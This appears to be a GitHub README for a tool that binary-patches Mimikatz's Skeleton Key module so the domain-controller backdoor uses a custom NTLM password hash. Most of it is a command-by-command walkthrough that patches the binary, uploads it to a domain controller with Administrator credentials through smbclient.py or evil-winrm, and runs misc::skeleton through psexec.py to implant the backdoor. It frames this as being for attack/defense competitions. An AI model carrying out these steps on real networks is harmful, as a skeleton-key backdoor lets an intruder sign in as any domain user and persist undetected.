Binary patching the Mimikatz implementation of the Skeleton Key exploit to update the global NTLM backdoor hash.
The Skeleton Key malware technique has existed for over a decade (Feng, Be'ery, and McIntyre 2015), but the standard implementation from Mimikatz creates the backdoor utilizing a particularly weak password (mimikatz) and does not support swapping out the hash of this default password with a custom or more secure one.
The hardcoded hash makes the tool impossible to use defensively in Attack/Defense scenarios and in general is just distastefully immutable. We solve this with a simple binary patching solution that swaps out the two instances of the default NTLM hash (60ba4fcadc466c7a033c178194c03df6) with the NTLM hash of a user-supplied password.
- Clone this repository locally

  ```sh
  git clone https://github.com/GoldenStack/skeleton-key
  ```

- Download the latest Mimikatz release and unzip it

  ```sh
  wget https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip && unzip mimikatz_trunk.zip
  ```

- Run `skeleton_patcher.py` on the correct (likely `x86`) Mimikatz binary to patch it

  ```sh
  python3 skeleton_patcher.py backdoor_password x86/mimikatz.exe x86/mimikatz_patch.exe
  ```

- Upload the Mimikatz binary to the target DC

  ```
  smbclient.py DC/Administrator:PASSWORD@IP
  > use C$
  > cd C:\Users\Administrator\Desktop
  > put x86/mimikatz_patch.exe
  ```

  Alternatively, you can use evil-winrm:

  ```
  evil-winrm -i <DC> -u Administrator -p <PASSWORD>
  > upload x86/mimikatz_patch.exe
  ```

- Connect to the DC and run the Skeleton Key

  ```
  psexec.py DC/Administrator:PASSWORD@IP
  > cd C:\Users\Administrator\Desktop
  > mimikatz_patch.exe
  > misc::skeleton
  ```

Note that we use evil-winrm to upload and psexec.py to run because evil-winrm supports easy-to-use upload functionality, but does not function correctly with Mimikatz.